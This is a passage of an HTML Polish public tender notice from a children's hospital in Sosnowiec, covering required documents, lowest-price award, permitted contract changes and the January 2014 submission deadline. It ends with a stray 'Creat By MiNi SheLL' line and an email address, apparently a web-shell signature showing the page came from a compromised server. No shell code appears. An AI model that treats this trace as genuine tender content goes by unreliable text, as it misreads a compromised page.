<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w  rozdziale VI niniejszej SIWZ oraz:
- wypełniony formularz oferty  o treści określonej w załączniku  7 do SIWZ,
- kosztorys  sporządzony metodą kalkulacji  uproszczonej obejmujący  pełen zakres robót budowlanych i instalacyjnych wraz z cenami   jednostkowymi i wartością robót, tabelą elementów scalonych, wykazem materiałów zawierającym ich charakterystykę techniczną, ilość, cenę,
- formularz  rzeczowo -cenowy o treści określonej w załączniku nr 15 do SIWZ,
- dowód wniesienia wadium,
- zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów o treści określonej w załączniku nr 13 do SIWZ.
W przypadku podpisania oferty oraz oświadczenia za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach:
1. Zmiany terminu realizacji:
a. z powodu  wystąpienia siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody,
b. konieczności udzielenia zamówienia  dodatkowego, niezbędnego  do prawidłowej realizacji przedmiotu umowy, a niemożliwego do przewidzenia w momencie udzielenia zamówienia o ile nie jest możliwe równoległe prowadzenie prac.
2. Zmiany ceny ofertowej:
a. ustawowej zmiany stawki podatku od towaru i usług VAT z dniem wejścia w życie  aktu prawnego,
b. wystąpienia robót dodatkowych, przy czym wartość robót dodatkowych nie może przekroczyć 20% ceny kosztorysowej brutto,
c. wystąpienia robót zaniechanych.
3. Zmiany sposobu realizacji przedmiotu umowy:
a. niedostępności na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej spowodowanej zaprzestaniem ich produkcji lub wycofaniem z rynku. Zmiana ta nie może spowodować obniżenia parametrów technicznych.
b. pojawieniem się na rynku materiałów lub urządzeń nowszej generacji, pozwalających na zaoszczędzenie kosztów realizacji lub kosztów eksploatacji,
c. konieczności zastosowania innych rozwiązań niż wskazanych w dokumentacji projektowej w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
d. zmiany materiałów i urządzeń przedstawionych w ofercie przetargowej oraz producenta poszczególnych materiałów i urządzeń, pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
4. Zmiany, o których mowa w pkt. 3 nie mogą powodować zmiany ceny ofertowej wykonania przedmiotu umowy.
5. Strona  wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy, które powinny zawierać:
a. opis zmiany,
b. uzasadnienie zmiany,
c. koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
d. czas wykonania zmiany oraz wpływ zmiany  na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.centrum-pediatrii.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Pediatrii im. Jana Pawła II w Sosnowcu
Dział Administracji, pokój 0.35
ul. Zapolskiej 3,
41-218 Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 08:00, miejsce: Centrum Pediatrii im. Jana Pawła II w Sosnowcu
Dział Administracji, pokój 0.35
ul. Zapolskiej 3,
41-218 Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com